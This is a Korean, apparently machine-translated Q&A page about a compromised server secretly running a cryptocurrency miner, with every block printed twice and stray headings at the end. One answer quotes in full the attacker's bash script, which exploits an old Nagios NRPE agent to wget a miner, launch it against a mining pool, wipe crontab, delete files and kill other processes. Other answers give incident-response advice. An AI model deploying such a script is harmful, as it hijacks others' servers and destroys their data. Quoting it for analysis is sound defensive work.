내가 해킹당했나요?

Question 1

서버 측 스크립팅(PHP, Ruby 등)을 허용하는 웹 서버를 실행하는 경우 이 작업은 매우 쉽습니다.

사용자가 해야 할 일은 파일을 다운로드 /tmp/sh64한 다음 실행하는 스크립트를 생성하는 것뿐입니다. 웹 스크립트는 일반적으로 외부 프로그램을 실행할 수 있어야 하므로 이러한 종류의 활동을 방지하기는 어렵습니다.

해당 계정이 사용자의 웹 스크립트를 실행하는 데 사용된 것과 동일한 계정 이라면 mick해킹되지 않은 것입니다. 단지 자신의 계정을 악용하는 사용자일 뿐입니다.

이 동작을 방지하려면 이를 방지할 수 있는 몇 가지 방법이 있습니다. 외부 프로그램 호출을 허용하지 않을 수도 있습니다. 또는 장기 실행 프로그램(예를 들어 60초 이상 실행 중인 모든 프로그램)을 종료하는 등의 작업을 수행할 수 있습니다.
설정에 대한 자세한 내용을 알지 못하면 최선의 조치를 결정하기가 어렵습니다.

Answer

서버 측 스크립팅(PHP, Ruby 등)을 허용하는 웹 서버를 실행하는 경우 이 작업은 매우 쉽습니다.

사용자가 해야 할 일은 파일을 다운로드 /tmp/sh64한 다음 실행하는 스크립트를 생성하는 것뿐입니다. 웹 스크립트는 일반적으로 외부 프로그램을 실행할 수 있어야 하므로 이러한 종류의 활동을 방지하기는 어렵습니다.

해당 계정이 사용자의 웹 스크립트를 실행하는 데 사용된 것과 동일한 계정 이라면 mick해킹되지 않은 것입니다. 단지 자신의 계정을 악용하는 사용자일 뿐입니다.

이 동작을 방지하려면 이를 방지할 수 있는 몇 가지 방법이 있습니다. 외부 프로그램 호출을 허용하지 않을 수도 있습니다. 또는 장기 실행 프로그램(예를 들어 60초 이상 실행 중인 모든 프로그램)을 종료하는 등의 작업을 수행할 수 있습니다.
설정에 대한 자세한 내용을 알지 못하면 최선의 조치를 결정하기가 어렵습니다.

Question 2

비슷한 문제가있었습니다. 그들은 Nagios의 NRPE 에이전트의 오래된 버전을 활용하여 wgetSourceforge(NRPE 데몬이 활성화됨)에서 비트코인 채굴기를 설치하고 구성하는 스크립트를 실행했습니다 dont_blame_nrpe. 내 컴퓨터에 대한 시도가 지속되었음을 나타내는 어떤 것도 찾지 못했습니다.

다음은 비트코인 채굴기 설치 및 설정에 사용된 스크립트입니다.

#!/bin/bash

miner_path="/tmp/tester"
miner_path2="/tmp/var/tester"
miner_path3="/dev/shm/tester"
stratum="stratum+tcp://multi1.wemineall.com:80"
worker="weedee.1"
myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
name="work.sh"
if [ -z "$myproc" ]
then    
    system=`uname -a`
    i686=`echo $system|grep i686`
    if ! [ -z "$i686" ]
      then

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664640&use_mirror=netcologne"
      else

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664665&use_mirror=netcologne"
    fi

    dll=`wget -q -O $miner_path $url;tar zxvf $miner_path -C /var/tmp/;mv /var/tmp/minerd $miner_path;chmod +x $miner_path`
    spwn=`$miner_path -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /var/tmp/ trying in /dev/shm
    if [ -z "$myproc" ]
    then
        #dll=`wget $url -O $miner_path2;chmod +x $miner_path2`
        dll=`wget -q -O $miner_path2 $url;tar zxvf $miner_path2 -C /tmp/;mv /tmp/minerd $miner_path2;chmod +x $miner_path2`
        spwn=`$miner_path2 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /tmp/ trying in /tmp
    if [ -z "$myproc" ]
    then        
        dll=`wget -q -O $miner_path3 $url;tar zxvf $miner_path3 -C /dev/shm/;mv /dev/shm/minerd $miner_path3;chmod +x $miner_path3`
        spwn=`$miner_path3 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi  

myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
  crontab -r
 fi  
 crontab -r
rm -rf /var/tmp/*.sh
kill -9 `ps x | grep -v nagios | grep -v nrpe | grep -v PID | grep -v $name | grep -v tester | grep -v grep | awk '{print $1}'

이 스크립트는 전적으로 Nagios 사용자로 실행되었으므로 루트 액세스가 필요하지 않았습니다.

Answer

비슷한 문제가있었습니다. 그들은 Nagios의 NRPE 에이전트의 오래된 버전을 활용하여 wgetSourceforge(NRPE 데몬이 활성화됨)에서 비트코인 채굴기를 설치하고 구성하는 스크립트를 실행했습니다 dont_blame_nrpe. 내 컴퓨터에 대한 시도가 지속되었음을 나타내는 어떤 것도 찾지 못했습니다.

다음은 비트코인 채굴기 설치 및 설정에 사용된 스크립트입니다.

#!/bin/bash

miner_path="/tmp/tester"
miner_path2="/tmp/var/tester"
miner_path3="/dev/shm/tester"
stratum="stratum+tcp://multi1.wemineall.com:80"
worker="weedee.1"
myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
name="work.sh"
if [ -z "$myproc" ]
then    
    system=`uname -a`
    i686=`echo $system|grep i686`
    if ! [ -z "$i686" ]
      then

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664640&use_mirror=netcologne"
      else

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664665&use_mirror=netcologne"
    fi

    dll=`wget -q -O $miner_path $url;tar zxvf $miner_path -C /var/tmp/;mv /var/tmp/minerd $miner_path;chmod +x $miner_path`
    spwn=`$miner_path -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /var/tmp/ trying in /dev/shm
    if [ -z "$myproc" ]
    then
        #dll=`wget $url -O $miner_path2;chmod +x $miner_path2`
        dll=`wget -q -O $miner_path2 $url;tar zxvf $miner_path2 -C /tmp/;mv /tmp/minerd $miner_path2;chmod +x $miner_path2`
        spwn=`$miner_path2 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /tmp/ trying in /tmp
    if [ -z "$myproc" ]
    then        
        dll=`wget -q -O $miner_path3 $url;tar zxvf $miner_path3 -C /dev/shm/;mv /dev/shm/minerd $miner_path3;chmod +x $miner_path3`
        spwn=`$miner_path3 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi  

myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
  crontab -r
 fi  
 crontab -r
rm -rf /var/tmp/*.sh
kill -9 `ps x | grep -v nagios | grep -v nrpe | grep -v PID | grep -v $name | grep -v tester | grep -v grep | awk '{print $1}'

이 스크립트는 전적으로 Nagios 사용자로 실행되었으므로 루트 액세스가 필요하지 않았습니다.

Question 3

귀하의 시스템은 확실히 손상되었거나 최악의 경우 해킹당했습니다. 유사한 광부가 설치되고 있다는 다른 이야기도 있습니다.

나는 귀하의 시스템이 손상되었다는 입장을 취하고 시스템에서 중요한 모든 것을 시작하여 아직 수행되지 않은 경우 백업하도록 하겠습니다.

분석

그들이 어떻게 침입했는지 궁금하다면 설치한 서비스(웹, mysql 등)의 전체 목록을 가져와서 누군가가 높은 권한을 얻을 수 있도록 허용하는 활성 공격이 있는지 확인해야 합니다.

웹 기반 애플리케이션인 웹 지원부터 시작하겠습니다. 일반적으로 이러한 애플리케이션은 버퍼 오버플로될 수 있으며 추가 애플리케이션을 설치할 수 있도록 웹 서버의 스택을 수정하는 데 액세스할 수 있습니다.

이러한 유형의 손상은 고립된 사고일 수 있으므로 시스템 전체 복구/설정을 수행하는 데 드는 시간을 견딜 필요 없이 문제가 되는 소프트웨어와 맬웨어를 제거하는 것만으로도 문제를 근절하기에 충분할 수 있습니다.

이 시스템이 VPS 기반 이미지를 사용하여 구축된 경우 패치를 적용하는 것이 모든 고객에게 최선의 이익인 것처럼 보이기 때문에 공급자와 협력할 것입니다.

단순히 웹 스택을 손상시키는 것 이상

상자에 있는 모든 항목을 면밀히 조사해야 하며 본질적으로 신뢰할 수 없지만 공격자가 어디에서 로그인하는지 알아낼 수 없는지 확인하는 데 약간의 시간이 걸릴 것입니다. 그들은 시스템을 손상시킨 후 시스템에 추가된 SSH 계정을 사용하여 로그인하고 있을 가능성이 있습니다.

이는 분석을 수행하는 데 며칠이 걸리는 힘든 작업일 수 있습니다. 특히 이 작업을 지원하는 상자에 포함된 도구 중 어느 것도 신뢰할 수 없는 경우에는 더욱 그렇습니다. 누구든지 이 시간을 내어 자신의 시스템이 어떻게 손상되었는지 이해하여 적어도 이 특정 벡터를 통해 향후 다시 발생할 위험을 줄일 수 있도록 권장합니다.

이것이 프로덕션 유형의 문제가 아닌 경우 실제로 시스템이 어떻게 손상될 수 있고 공격자가 액세스를 "활용"할 수 있는지에 대한 귀중한 통찰력을 얻을 수 있는 좋은 학습 기회입니다.

실버 라이닝?

시스템이 채굴 목적으로 사용되고 있기 때문에 좀비 채굴기를 설정하기에 충분한 시스템을 공격하는 데 많은 시간이 걸릴 것으로 보이기 때문에 자동화된 스크립팅 도구 세트를 사용했을 가능성이 높습니다. 이와 같은 도구를 사용하는 경우 일반적으로 구성이 조잡하고 발판을 마련한 다음 페이로드(채굴 소프트웨어)를 전달하기 위해 최소한의 노력만 하므로 운이 좋으면 추가 통찰력을 얻을 수 있습니다. 그들이 어떻게 들어갈 수 있었는지.

Answer

귀하의 시스템은 확실히 손상되었거나 최악의 경우 해킹당했습니다. 유사한 광부가 설치되고 있다는 다른 이야기도 있습니다.

나는 귀하의 시스템이 손상되었다는 입장을 취하고 시스템에서 중요한 모든 것을 시작하여 아직 수행되지 않은 경우 백업하도록 하겠습니다.

분석

그들이 어떻게 침입했는지 궁금하다면 설치한 서비스(웹, mysql 등)의 전체 목록을 가져와서 누군가가 높은 권한을 얻을 수 있도록 허용하는 활성 공격이 있는지 확인해야 합니다.

웹 기반 애플리케이션인 웹 지원부터 시작하겠습니다. 일반적으로 이러한 애플리케이션은 버퍼 오버플로될 수 있으며 추가 애플리케이션을 설치할 수 있도록 웹 서버의 스택을 수정하는 데 액세스할 수 있습니다.

이러한 유형의 손상은 고립된 사고일 수 있으므로 시스템 전체 복구/설정을 수행하는 데 드는 시간을 견딜 필요 없이 문제가 되는 소프트웨어와 맬웨어를 제거하는 것만으로도 문제를 근절하기에 충분할 수 있습니다.

이 시스템이 VPS 기반 이미지를 사용하여 구축된 경우 패치를 적용하는 것이 모든 고객에게 최선의 이익인 것처럼 보이기 때문에 공급자와 협력할 것입니다.

단순히 웹 스택을 손상시키는 것 이상

상자에 있는 모든 항목을 면밀히 조사해야 하며 본질적으로 신뢰할 수 없지만 공격자가 어디에서 로그인하는지 알아낼 수 없는지 확인하는 데 약간의 시간이 걸릴 것입니다. 그들은 시스템을 손상시킨 후 시스템에 추가된 SSH 계정을 사용하여 로그인하고 있을 가능성이 있습니다.

이는 분석을 수행하는 데 며칠이 걸리는 힘든 작업일 수 있습니다. 특히 이 작업을 지원하는 상자에 포함된 도구 중 어느 것도 신뢰할 수 없는 경우에는 더욱 그렇습니다. 누구든지 이 시간을 내어 자신의 시스템이 어떻게 손상되었는지 이해하여 적어도 이 특정 벡터를 통해 향후 다시 발생할 위험을 줄일 수 있도록 권장합니다.

이것이 프로덕션 유형의 문제가 아닌 경우 실제로 시스템이 어떻게 손상될 수 있고 공격자가 액세스를 "활용"할 수 있는지에 대한 귀중한 통찰력을 얻을 수 있는 좋은 학습 기회입니다.

실버 라이닝?

시스템이 채굴 목적으로 사용되고 있기 때문에 좀비 채굴기를 설정하기에 충분한 시스템을 공격하는 데 많은 시간이 걸릴 것으로 보이기 때문에 자동화된 스크립팅 도구 세트를 사용했을 가능성이 높습니다. 이와 같은 도구를 사용하는 경우 일반적으로 구성이 조잡하고 발판을 마련한 다음 페이로드(채굴 소프트웨어)를 전달하기 위해 최소한의 노력만 하므로 운이 좋으면 추가 통찰력을 얻을 수 있습니다. 그들이 어떻게 들어갈 수 있었는지.

내가 해킹당했나요?

답변1

답변2

답변3

분석

단순히 웹 스택을 손상시키는 것 이상

실버 라이닝?

관련 정보